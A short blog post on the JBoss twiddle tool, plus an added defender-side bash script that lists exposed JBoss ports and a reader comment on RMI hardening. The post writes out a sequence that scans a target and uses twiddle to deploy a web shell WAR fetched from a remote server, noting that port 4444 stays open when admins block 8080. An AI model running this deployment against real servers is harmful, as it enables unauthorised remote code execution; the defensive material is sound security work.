How to use twiddle – JBoss by command line

twiddle is a command-line tool found in the bin/ directory of any JBoss version before 7; in JBoss 7 it has been replaced by a management interface (JBoss 7 CLI). What you usually do with twiddle is:

nmap RHOST -p 1099,4444,8080
twiddle.sh -s RHOST invoke "jboss.system:service=MainDeployer" deploy http://my.public.server.com/wsh.war
(go to) http://RHOST:8080/wsh/

4444 is the JBoss RMI default port – if you cannot reach the RMI port, no twiddle call will work.

This is to upload a web shell and then interact with it through 8080; sometimes you can't access 8080! This happened to me at least twice, as the administrator shielded the web port through iptables, but left 4444 open. This article about how to interact with an application through RMI was extremely useful: http://www.contextis.com/research/blog/inf1/
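
An added example, not from the original post: a defender-side check that parses `ss -ltn` output and lists which of the ports probed above (1099, 4444, 8080) are listening on a non-loopback address, so a filter rule on 8080 alone is not mistaken for full coverage. The function name and the sample lines are constructed for illustration.

```shell
#!/usr/bin/env bash
# Ports taken from the article's nmap line.
JBOSS_PORTS="1099 4444 8080"

# Reads `ss -ltn` style lines on stdin (State Recv-Q Send-Q Local Peer) and
# prints "port address" for every JBoss port bound to a non-loopback address.
# Each line printed is a listener that the host firewall must cover.
exposed_jboss_ports() {
    awk -v ports="$JBOSS_PORTS" '
        BEGIN { n = split(ports, p, " "); for (i = 1; i <= n; i++) want[p[i]] = 1 }
        $1 == "LISTEN" {
            local_addr = $4
            # Port is the text after the last colon; works for
            # 0.0.0.0:4444, *:4444 and [::]:4444 alike.
            port = local_addr; sub(/^.*:/, "", port)
            addr = local_addr; sub(/:[^:]*$/, "", addr)
            if (!(port in want)) next
            # Loopback-only listeners are not reachable from other hosts.
            if (addr ~ /^127\./ || addr == "[::1]" || addr ~ /^\[::ffff:127\./) next
            print port, addr
        }' | sort -u
}

# Constructed sample: web port bound to loopback, RMI-side ports bound to all
# interfaces, plus two unrelated listeners that must be ignored.
SAMPLE='State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 0.0.0.0:4444 0.0.0.0:*
LISTEN 0 50 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 50 [::]:1099 [::]:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 50 127.0.0.1:1098 0.0.0.0:*'

printf '%s\n' "$SAMPLE" | exposed_jboss_ports

# On a live host: ss -ltn | exposed_jboss_ports
```

Any line in the output names a port that needs the same iptables treatment as 8080, or a loopback-only bind address.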


2 thoughts on “How to use twiddle – JBoss by command line”

    • The RMI method should, in both ways; RMI depends on local servlets like invoker.sar and others. The JMX-Console or the Admin-console (jboss6) are only ways to invoke them, so their absence does not imply it is impossible to use invoker or other services (JNDI). If they hardened JBoss in a proper way, there should be no possibility to invoke them without a password OR from a host other than localhost.
